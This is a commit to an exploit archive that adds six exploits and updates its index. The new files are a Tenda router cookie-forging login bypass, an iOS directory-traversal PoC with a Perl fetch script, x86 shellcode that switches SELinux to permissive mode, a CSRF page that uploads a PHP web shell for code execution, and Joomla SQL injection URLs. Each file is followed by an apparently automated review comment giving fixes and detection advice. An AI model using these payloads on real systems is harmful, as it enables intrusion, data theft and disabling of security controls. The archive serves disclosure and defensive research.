DB: 2017-02-21
6 new exploits EFS Easy Chat Server - Authentication Request Buffer Overflow (SEH) EFS Easy Chat Server 2.2 - Authentication Request Buffer Overflow (SEH) EFS Easy Chat Server - Cross-Site Request Forgery (Change Admin Password) EFS Easy Chat Server 2.2 - Cross-Site Request Forgery (Change Admin Password) EFS Easy Chat Server - Authentication Request Buffer Overflow (Perl) EFS Easy Chat Server 2.2 - Authentication Request Buffer Overflow (Perl) yaws 1.89 - Directory Traversal Yaws 1.89 - Directory Traversal Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes) Jogjacamp JProfile Gold - (id_news) SQL Injection Jogjacamp JProfile Gold - 'id_news' Parameter SQL Injection RSS News AutoPilot Script 1.0.1 / 3.0.3 - Cross-Site Request Forgery Joomla! Component MaQma Helpdesk 4.2.7 - 'id' Parameter SQL Injection Joomla! Component PayPal IPN for DOCman 3.1 - 'id' Parameter SQL Injection Album Lock 4.0 iOS - Directory Traversal Tenda N3 Wireless N150 Home Router - Authentication Bypass
This commit is contained in:
parent
ae0dd9fa7c
commit
4195f70ade
7 changed files with 462 additions and 5 deletions
16
files.csv
16
files.csv
|
@ -9946,12 +9946,12 @@ id,file,description,date,author,platform,type,port
|
|||
8097,platforms/multiple/remote/8097.txt,"MLdonkey 2.9.7 - Arbitrary File Disclosure",2009-02-23,"Michael Peselnik",multiple,remote,0
|
||||
8117,platforms/windows/remote/8117.pl,"POP Peeper 3.4.0.0 - UIDL Remote Buffer Overflow (SEH)",2009-02-27,"Jeremy Brown",windows,remote,0
|
||||
8118,platforms/windows/remote/8118.html,"Orbit Downloader 2.8.4 - Long Hostname Remote Buffer Overflow",2009-02-27,JavaGuru,windows,remote,0
|
||||
8142,platforms/windows/remote/8142.py,"EFS Easy Chat Server - Authentication Request Buffer Overflow (SEH)",2009-03-03,His0k4,windows,remote,80
|
||||
8142,platforms/windows/remote/8142.py,"EFS Easy Chat Server 2.2 - Authentication Request Buffer Overflow (SEH)",2009-03-03,His0k4,windows,remote,80
|
||||
8143,platforms/windows/remote/8143.html,"Sopcast SopCore Control - 'sopocx.ocx' Command Execution",2009-03-03,Nine:Situations:Group,windows,remote,0
|
||||
8144,platforms/windows/remote/8144.txt,"Imera ImeraIEPlugin - ActiveX Control Remote Code Execution",2009-03-03,Elazar,windows,remote,0
|
||||
8149,platforms/windows/remote/8149.txt,"EFS Easy Chat Server - Cross-Site Request Forgery (Change Admin Password)",2009-03-03,Stack,windows,remote,0
|
||||
8149,platforms/windows/remote/8149.txt,"EFS Easy Chat Server 2.2 - Cross-Site Request Forgery (Change Admin Password)",2009-03-03,Stack,windows,remote,0
|
||||
8152,platforms/windows/remote/8152.py,"Microsoft Internet Explorer 7 - Memory Corruption (MS09-002)",2009-03-04,"Ahmed Obied",windows,remote,0
|
||||
8154,platforms/windows/remote/8154.pl,"EFS Easy Chat Server - Authentication Request Buffer Overflow (Perl)",2009-03-04,Dr4sH,windows,remote,80
|
||||
8154,platforms/windows/remote/8154.pl,"EFS Easy Chat Server 2.2 - Authentication Request Buffer Overflow (Perl)",2009-03-04,Dr4sH,windows,remote,80
|
||||
8155,platforms/windows/remote/8155.txt,"Easy File Sharing Web Server 4.8 - File Disclosure",2009-03-04,Stack,windows,remote,0
|
||||
8160,platforms/windows/remote/8160.html,"SupportSoft DNA Editor Module - 'dnaedit.dll' Code Execution",2009-03-05,Nine:Situations:Group,windows,remote,0
|
||||
8173,platforms/windows/remote/8173.txt,"Belkin BullDog Plus - UPS-Service Buffer Overflow",2009-03-09,Elazar,windows,remote,0
|
||||
|
@ -10443,7 +10443,7 @@ id,file,description,date,author,platform,type,port
|
|||
15357,platforms/windows/remote/15357.php,"Home FTP Server 1.11.1.149 RETR DELE RMD - Directory Traversal",2010-10-30,"Yakir Wizman",windows,remote,0
|
||||
15358,platforms/windows/remote/15358.txt,"SmallFTPd 1.0.3 - Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0
|
||||
15368,platforms/windows/remote/15368.php,"Buffy 1.3 - Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0
|
||||
15371,platforms/windows/remote/15371.txt,"yaws 1.89 - Directory Traversal",2010-11-01,nitr0us,windows,remote,0
|
||||
15371,platforms/windows/remote/15371.txt,"Yaws 1.89 - Directory Traversal",2010-11-01,nitr0us,windows,remote,0
|
||||
15373,platforms/windows/remote/15373.txt,"mongoose Web server 2.11 - Directory Traversal",2010-11-01,nitr0us,windows,remote,0
|
||||
15421,platforms/windows/remote/15421.html,"Microsoft Internet Explorer 6/7/8 - Memory Corruption",2010-11-04,ryujin,windows,remote,0
|
||||
15423,platforms/android/remote/15423.html,"Google Android 2.0 < 2.1 - Reverse Shell Exploit",2010-11-05,"MJ Keith",android,remote,0
|
||||
|
@ -15899,6 +15899,7 @@ id,file,description,date,author,platform,type,port
|
|||
41375,platforms/linux/shellcode/41375.c,"Linux - Dual/Multi mode Bind Shell Shellcode (156 bytes)",2017-02-16,odzhancode,linux,shellcode,0
|
||||
41381,platforms/win_x86/shellcode/41381.c,"Windows x86 - Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",win_x86,shellcode,0
|
||||
41398,platforms/linux/shellcode/41398.nasm,"Linux - Reverse Shell Shellcode (66 bytes)",2017-02-19,"Robert L. Taylor",linux,shellcode,0
|
||||
41403,platforms/lin_x86/shellcode/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,"Krzysztof Przybylski",lin_x86,shellcode,0
|
||||
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
|
||||
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
|
||||
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
|
||||
|
@ -20815,7 +20816,7 @@ id,file,description,date,author,platform,type,port
|
|||
8141,platforms/php/webapps/8141.txt,"blindblog 1.3.1 - SQL Injection / Authentication Bypass / Local File Inclusion",2009-03-03,"Salvatore Fresta",php,webapps,0
|
||||
8145,platforms/php/webapps/8145.txt,"tghostscripter Amazon Shop - Cross-Site Scripting / Directory Traversal / Remote File Inclusion",2009-03-03,d3b4g,php,webapps,0
|
||||
8150,platforms/php/webapps/8150.txt,"Novaboard 1.0.1 - Cross-Site Scripting",2009-03-03,Pepelux,php,webapps,0
|
||||
8151,platforms/php/webapps/8151.txt,"Jogjacamp JProfile Gold - (id_news) SQL Injection",2009-03-03,kecemplungkalen,php,webapps,0
|
||||
8151,platforms/php/webapps/8151.txt,"Jogjacamp JProfile Gold - 'id_news' Parameter SQL Injection",2009-03-03,kecemplungkalen,php,webapps,0
|
||||
8161,platforms/php/webapps/8161.txt,"celerbb 0.0.2 - Multiple Vulnerabilities",2009-03-05,"Salvatore Fresta",php,webapps,0
|
||||
8164,platforms/php/webapps/8164.php,"Joomla! Component com_iJoomla_archive - Blind SQL Injection",2009-03-05,Stack,php,webapps,0
|
||||
8165,platforms/php/webapps/8165.txt,"Blue Eye CMS 1.0.0 - Remote Cookie SQL Injection",2009-03-06,ka0x,php,webapps,0
|
||||
|
@ -37310,7 +37311,12 @@ id,file,description,date,author,platform,type,port
|
|||
41389,platforms/php/webapps/41389.txt,"Joomla! Component Room Management 1.0 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
|
||||
41390,platforms/php/webapps/41390.txt,"Joomla! Component Bazaar Platform 3.0 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
|
||||
41391,platforms/php/webapps/41391.txt,"Joomla! Component Google Map Store Locator 4.4 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
|
||||
41392,platforms/php/webapps/41392.html,"RSS News AutoPilot Script 1.0.1 / 3.0.3 - Cross-Site Request Forgery",2016-08-30,"Arbin Godar",php,webapps,0
|
||||
41393,platforms/php/webapps/41393.txt,"Joomla! Component Most Wanted Real Estate 1.1.0 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
|
||||
41394,platforms/hardware/webapps/41394.py,"NETGEAR DGN2200v1/v2/v3/v4 - 'ping.cgi' Remote Command Execution",2017-02-18,SivertPL,hardware,webapps,0
|
||||
41395,platforms/windows/webapps/41395.txt,"Sawmill Enterprise 8.7.9 - Authentication Bypass",2017-02-18,hyp3rlinx,windows,webapps,0
|
||||
41396,platforms/php/webapps/41396.txt,"PHPShell 2.4 - Session Fixation",2017-02-19,hyp3rlinx,php,webapps,0
|
||||
41399,platforms/php/webapps/41399.txt,"Joomla! Component MaQma Helpdesk 4.2.7 - 'id' Parameter SQL Injection",2017-02-20,"Ihsan Sencan",php,webapps,0
|
||||
41400,platforms/php/webapps/41400.txt,"Joomla! Component PayPal IPN for DOCman 3.1 - 'id' Parameter SQL Injection",2017-02-20,"Ihsan Sencan",php,webapps,0
|
||||
41401,platforms/ios/webapps/41401.txt,"Album Lock 4.0 iOS - Directory Traversal",2017-02-20,Vulnerability-Lab,ios,webapps,0
|
||||
41402,platforms/hardware/webapps/41402.txt,"Tenda N3 Wireless N150 Home Router - Authentication Bypass",2015-09-03,"Mandeep Jadon",hardware,webapps,0
|
||||
|
|
|
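--- a/platforms/hardware/webapps/41402.txt
+++ b/platforms/hardware/webapps/41402.txt
@@ -0,0 +1,38 @@
+# Exploit Title: Complete Authentication Bypass In Tenda N3 Wireless N150 Routers
+# Date: 03-09-2015
+# Software Link: http://tendacn.com/en/product/N150.html
+# Exploit Author: Mandeep Jadon
+# Contact: http://twitter.com/1337tr0lls
+# Website: http://twitter.com/1337tr0lls
+# CVE: CVE-2015-5995
+# Category: Device
+
+
+Description:
+
+The router (AP) is using very poor authentication mechanism . It uses a
+static cookie to verify the incoming authentication. After careful
+inspection it was found that the cookie used were same for any number of
+authentication by the Admin .
+
+Thus the cookie can be easily forged and the admin account could be
+compromised without supplying the credentials .
+
+Proof Of Concept:
+
+Inject the following cookie in the browser with the given values :
+
+admin:language : en
+
+Reload the page . You are logged into the admin account .
+
+Video POC : https://www.youtube.com/watch?v=dvF-7KK0g6E
+
+Mitigation :
+
+Use: a secure authentication mechanism consisting of random , complex
+cookies .
+
+References :
+https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5995
+https://www.kb.cert.org/vuls/id/630872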
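Review bot: The `Mitigation :` section's "random , complex cookies" names the symptom rather than the defect; the description above it says the same cookie is accepted for every admin session, so the missing control is a server-side session, not merely a longer cookie value. The line would be more useful to a device maintainer as `Use: a per-login session token generated from a CSPRNG, stored on the device and invalidated on logout or timeout; reject any request whose cookie does not match a live session.` For operators who cannot patch, the advisory could also note that administrative actions arriving without a preceding successful login are the event to log and alert on.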
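--- a/platforms/ios/webapps/41401.txt
+++ b/platforms/ios/webapps/41401.txt
@@ -0,0 +1,186 @@
+Document Title:
+===============
+Album Lock v4.0 iOS - Directory Traversal Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2033
+
+
+Release Date:
+=============
+2017-02-20
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2033
+
+
+Common Vulnerability Scoring System:
+====================================
+7.2
+
+
+Product & Service Introduction:
+===============================
+Do you have any secret photo and videos in your iPhone? Album Lock can protect your privacy perfectly. Album is the most
+convenient private Photo&Video App! You can add your SPECIAL photos&videos into AlbumLock, we provides many convenient ways.
+From Photo App(Camera Roll), iTunes File Sharing Sync, WiFi Transfer and in App Camera.
+
+(Copy of the Homepage: https://itunes.apple.com/us/app/album-lock-lock-secret-photo/id851608952 )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a directory traversal web vulnerability in the official Album Lock v4.0 ios mobile application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2017-02-20: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+A directory traversal web vulnerability has been dsicovered in the official Album Lock v4.0 iOS mobile web-application.
+The issue allows an attackers to unauthorized request and download local application files by manipulation of path parameters.
+
+The directory traversal web vulnerability is located in the `filePaht` parameter of the wifi web-server interface. Remote attackers
+are able to request the local web-server during the sharing process to access unauthenticated application files. Attackers are able
+to request via `getObject` image path variables to access or download files. Remote attackers are able to access the root `document`
+path of the application. The request method to execute is GET and the attack vector is located on the client-side of the web-server
+web-application. Finally an attacker is able to access with the credentials the service by using a client via http protocol.
+
+The security risk of the directory traversal vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.2.
+Exploitation of the web vulnerability requires no privilege web-application user account or user interaction. Successful exploitation of the
+vulnerability results in information leaking, mobile application compromise by unauthorized and unauthenticated access.
+
+Request Method(s):
+[+] GET
+
+Vulnerable Module(s):
+[+] getObject
+
+Vulnerable Parameter(s):
+[+] filePaht
+
+Affected Module(s):
+[+] Web-Server File System
+
+
+Proof of Concept (PoC):
+=======================
+The security vulnerability can be exploited by remote attackers without user interaction or privilege web-application user account.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+
+Standard Request:
+http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/Documents/._alias_images/fhhjjj/picture-00001.png
+
+
+PoC: Payload
+/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C./../../../Application
+
+
+Malicious Request: Exploitation
+http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/Documents/
+http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/
+http://localhost:8880/getImage?filePaht=/var/mobile/
+
+
+PoC: Exploit
+use strict;
+use LWP::UserAgent;
+my $b = LWP::UserAgent->new();
+my $host = "1.1.1.1:5555";
+print $b->get("http://".$host."/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/config.dat")->content;
+
+
+--- PoC Session Logs [GET] ---
+Status: 200[OK]
+GET http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C./../../../Application
+Mime Type[application/x-unknown-content-type]
+Request Header:
+Host[localhost:8880]
+User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0]
+Accept[*/*]
+Accept-Language[de,en-US;q=0.7,en;q=0.3]
+Referer[http://localhost:8880/list_gif.html?folder=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/]
+Connection[keep-alive]
+Response Header:
+Accept-Ranges[bytes]
+
+
+Reference(s):
+http://localhost:8880/
+http://localhost:8880/getImage
+http://localhost:8880/getImage?filePaht=
+http://localhost:8880/list_gif.html
+http://localhost:8880/list_gif.html?folder=
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be patch by disallowing the filepaht parameter to request upper local paths outside the document folder.
+Include a whitelist of allowed requested path and setup a secure exception to prevent on exploitation.
+
+
+Security Risk:
+==============
+The security risk of the directory traversal web vulnerability in the mobile application is estimated as high. (CVSS 7.2)
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
+or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
+in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
+or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for
+consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+
+Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
+Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
+Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
+Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
+Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
+
+Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
+of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.
+
+Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+
+
+--
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
+
+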
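Review bot: The `Vulnerable Module(s):` entry names `[+] getObject`, but every request in the PoC, the session log and the `Reference(s)` list goes to `/getImage`, so the module name and the evidence do not agree and one of them should be corrected. The Perl PoC also sets `my $host = "1.1.1.1:5555";` while the standard request and the captured session use `localhost:8880`; either the port difference is meaningful and should be explained, or the PoC should match the rest of the advisory. In `Solution - Fix & Patch`, a path allow-list is not the check that closes a traversal: the `filePaht` value must be canonicalized (resolving `..` segments and symlinks) and the result required to lie under the app's Documents directory before the file is opened, since a prefix test on the raw string passes once `..` segments are present. `dsicovered` in the Technical Details section is a typo.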
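--- a/platforms/lin_x86/shellcode/41403.c
+++ b/platforms/lin_x86/shellcode/41403.c
@@ -0,0 +1,80 @@
+# Title: x86 SELinux change between permissive and enforcing modes shellcode
+# Date: 20-02-2017
+# Author: Krzysztof Przybylski
+# Platform: Lin_x86
+# Tested on: CentOS 6.8 (i686)
+# Shellcode Size: 45 bytes
+# ID: SLAE - 871
+/*
+
+1. Description:
+
+SELinux mode switcher. Permissive = "\x30"; Enforcing = "\x31"
+gcc -fno-stack-protector -z execstack SELinux-mode.c -o SELinux-mode
+
+2. Disassembly of section .text:
+
+08048060 <_start>:
+8048060: 6a 0b push 0xb
+8048062: 58 pop eax
+8048063: 31 d2 xor edx,edx
+8048065: 52 push edx
+8048066: 6a 30 push 0x30
+8048068: 89 e1 mov ecx,esp
+804806a: 52 push edx
+804806b: 68 6f 72 63 65 push 0x6563726f
+8048070: 68 74 65 6e 66 push 0x666e6574
+8048075: 68 6e 2f 73 65 push 0x65732f6e
+804807a: 68 2f 73 62 69 push 0x6962732f
+804807f: 68 2f 75 73 72 push 0x7273752f
+8048084: 89 e3 mov ebx,esp
+8048086: 52 push edx
+8048087: 51 push ecx
+8048088: 53 push ebx
+8048089: 89 e1 mov ecx,esp
+804808b: cd 80 int 0x80
+
+3. Code
+
+global _start
+section .text
+_start:
+push 0xb
+pop eax
+xor edx, edx
+push edx
+push byte 0x30
+mov ecx, esp
+push edx
+push 0x6563726f
+push 0x666e6574
+push 0x65732f6e
+push 0x6962732f
+push 0x7273752f
+mov ebx, esp
+push edx
+push ecx
+push ebx
+mov ecx, esp
+int 0x80
+*/
+
+#include<stdio.h>
+#include<string.h>
+
+unsigned char code[] = \
+"\x6a\x0b\x58\x31\xd2\x52\x6a"
+"\x30"
+"\x89\xe1\x52\x68\x6f\x72\x63\x65"
+"\x68\x74\x65\x6e\x66\x68\x6e\x2f"
+"\x73\x65\x68\x2f\x73\x62\x69\x68"
+"\x2f\x75\x73\x72\x89\xe3\x52\x51"
+"\x53\x89\xe1\xcd\x80";
+
+main()
+{
+printf("Shellcode Length: %d\n", strlen(code));
+int (*ret)() = (int(*)())code;
+ret();
+}
+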
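Review bot: `printf("Shellcode Length: %d\n", strlen(code));` passes a `size_t` to a `%d` conversion, and `main()` is written in the implicit-int form that C99 and later compilers reject, so the harness does not build cleanly with `-std=c99 -Wall`; `int main(void)`, `printf("Shellcode Length: %zu\n", strlen(code));` and a closing `return 0;` fix all three. The header documents `"\x30"` and `"\x31"` for the two modes but nothing in the harness says which byte is compiled in; a comment above the lone `"\x30"` string, `/* argument byte: "0" = permissive, "1" = enforcing */`, would record it. The jump through `(int(*)())code` executes from a writable data array rather than the stack, so whether the `-z execstack` flag in the build line is sufficient presumably depends on the loader treating that flag as read-implies-exec for the whole image — the description should say that this is what was relied on in the CentOS 6.8 test. From a defender's side the header is also missing the two facts that matter most: the `execve` the pushed dwords spell out only succeeds for a process that already holds the privileges SELinux requires for a mode change, and the change itself is recorded by the audit subsystem (a `MAC_STATUS` record when auditd is running), so it is detectable rather than silent.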
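--- a/platforms/php/webapps/41392.html
+++ b/platforms/php/webapps/41392.html
@@ -0,0 +1,112 @@
+# Exploit Title: RSS News AutoPilot Script 1.0.1 / 3.0.3 - CSRF to
+Persistent XSS and RCE Through Unrestricted File Upload
+# Date: 30 August 2016
+# Exploit Author: Arbin Godar
+# Website : ArbinGodar.com
+# Software Link: https://codecanyon.net/item/rss-news-autopilot-script/11812898
+# Version: 1.0.1 to 3.0.3
+
+----------------------------------------------------------------------------------------------------------------------
+
+RSS News AutoPilot Script File:
+http://www.mediafire.com/file/6dmegm8ak1jv2u1/rss.zip
+
+Description:
+An Attackers are able to execute js and php code on web
+application using RSS News - AutoPilot Script which allow an attacker to
+create a post when an authenticated user/admin browses a special
+crafted web page. Also, all the process was possible without any
+authenticated user/admin for more info watch the below PoC Video.
+
+The title parameter was not filtering special characters mean
+vulnerable to XSS and while uploading image they weren't filtering the file
+type mean vulnerable to unrestricted file upload. So, now by creating CSRF
+exploit code for posting
+an article with XSS alert JS payload as title of post and php file as a
+image. Now if the
+attacker is able to perform CSRF attack sucessfully then XSS will be
+triggered and we can execute php code too.
+
+PoC Video: https://youtu.be/znDgv8K0yFk
+
+CSRF Exploit Code:
+
+<html>
+<body>
+<title>[RSS News - AutoPilot Script] CSRF to Persistent XSS and
+RCE</title>
+<script>
+function submitRequest()
+{
+var xhr = new XMLHttpRequest();
+xhr.open("POST", "http://localhost/news.php?case=add", true);
+xhr.setRequestHeader("Accept",
+"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
+xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+xhr.setRequestHeader("Content-Type", "multipart/form-data;
+boundary=---------------------------2331884730649");
+xhr.withCredentials = true;
+var body = "-----------------------------2331884730649\r\n" +
+"Content-Disposition: form-data; name=\"title\"\r\n" +
+"\r\n" +
+"Test\r\n" +
+"-----------------------------2331884730649\r\n" +
+"Content-Disposition: form-data; name=\"category_id\"\r\n" +
+"\r\n" +
+"1\r\n" +
+"-----------------------------2331884730649\r\n" +
+"Content-Disposition: form-data; name=\"thumbnail\";
+filename=\"lod.php\"\r\n" +
+"Content-Type: application/octet-stream\r\n" +
+"\r\n" +
+"\x3c?php echo \'\x3cform action=\"\" method=\"post\"
+enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\"\x3e\';
+echo \'\x3cinput type=\"file\" name=\"file\" size=\"50\"\x3e\x3cinput
+name=\"_upl\" type=\"submit\" id=\"_upl\"
+value=\"Upload\"\x3e\x3c/form\x3e\'; if( $_POST[\'_upl\'] == \"Upload\" ) {
+if(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) {
+echo \'\x3cb\x3eUpload Sukses!!!\x3cb\x3e\x3cbr\x3e\x3cbr\x3e\'; } else {
+echo \'\x3cb\x3eGagal Upload!!!\x3c/b\x3e\x3cbr\x3e\x3cbr\x3e\'; } } ?\x3e
+\r\n" +
+"\r\n" +
+"-----------------------------2331884730649\r\n" +
+"Content-Disposition: form-data; name=\"details\"\r\n" +
+"\r\n" +
+"\x3cp\x3etest\x3c/p\x3e\r\n" +
+"-----------------------------2331884730649\r\n" +
+"Content-Disposition: form-data; name=\"published\"\r\n" +
+"\r\n" +
+"1\r\n" +
+"-----------------------------2331884730649\r\n" +
+"Content-Disposition: form-data; name=\"submit\"\r\n" +
+"\r\n" +
+"\r\n" +
+"-----------------------------2331884730649--\r\n";
+var aBody = new Uint8Array(body.length);
+for (var i = 0; i < aBody.length; i++)
+aBody[i] = body.charCodeAt(i);
+xhr.send(new Blob([aBody]));
+}
+</script>
+<br><br><br>
+<center>
+<h2><font color="red">[RSS News - AutoPilot Script] CSRF to Persistent
+XSS and RCE</font></h2>
+<form action="#">
+<input type="button" value="Submit request"
+onclick="submitRequest();" />
+</form>
+</center>
+</body>
+</html>
+
+Vendor Shouted Urgent Update:
+http://wpsup.com/products/rss-news-script/urgent-update-fix-security-bugs/
+
+Fix/Patch: Update to latest version.
+
+----------------------------------------------------------------------------------------------------------------------
+
+Regards,
+Arbin Godar
+https://twitter.com/arbingodar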
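Review bot: `Fix/Patch: Update to latest version.` does not say which release closes the three issues, so a reader running 3.0.3 cannot tell from this file whether they are still exposed; the line should name it, e.g. `Fix/Patch: fixed in [VERSION - confirm against the vendor notice linked above]`. The header's `# Version: 1.0.1 to 3.0.3` and the files.csv title `1.0.1 / 3.0.3` also read differently (a range versus two releases), and the advisory should state which it means. The remediation that maintainers of the script need is not spelled out anywhere: a per-request anti-CSRF token verified on `news.php?case=add`, the `SameSite` attribute on the session cookie, a server-side allow-list of image types checked by content rather than by the supplied filename, and storing uploads outside the web root so the PHP handler never runs them.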
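--- a/platforms/php/webapps/41399.txt
+++ b/platforms/php/webapps/41399.txt
@@ -0,0 +1,17 @@
+# # # # #
+# Exploit Title: Joomla! Component MaQma Helpdesk v4.2.7 - SQL Injection
+# Google Dork: inurl:index.php?option=com_maqmahelpdesk
+# Date: 20.02.2017
+# Vendor Homepage: http://componentslab.com/
+# Software Buy: https://extensions.joomla.org/extensions/extension/clients-a-communities/help-desk/maqma-helpdesk/
+# Demo: http://demo.componentslab.com/index.php/department/software-support
+# Version: 4.2.7
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_maqmahelpdesk&task=pdf_kb&id=[SQL]
+# # # # #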
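Review bot: Neither this advisory nor platforms/php/webapps/41400.txt records whether the vendor was notified or whether a fixed release exists, so `# Version: 4.2.7` (and `# Version: 3.1` in 41400) cannot be read as "affected up to and including"; a `# Vendor notified:` line with a date or "not contacted", and a `# Fixed in:` line with a version or "unknown", would close that gap. Neither file says whether the injection is error-based, union-based or blind, which is what a reader needs to judge the impact the title implies. For the component authors, the `id` value reached through `task=pdf_kb` here and `task=addToCart` in 41400 is an integer key and should be read with `getInt('id')` or cast with `(int)` and bound through the database layer's quoting before it is placed in a query.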
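--- a/platforms/php/webapps/41400.txt
+++ b/platforms/php/webapps/41400.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Joomla! Component PayPal IPN for DOCman v3.1 - SQL Injection
+# Google Dork: inurl:index.php?option=com_docmanpaypal
+# Date: 20.02.2017
+# Vendor Homepage: http://shopfiles.com/
+# Software Buy: https://extensions.joomla.org/extensions/extension/extension-specific/docman-extensions/paypal-ipn-for-docman/
+# Demo: http://demo.shopfiles.com/index.php/paypal-ipn-for-docman
+# Version: 3.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_docmanpaypal&task=addToCart&id=[SQL]
+# # # # #
+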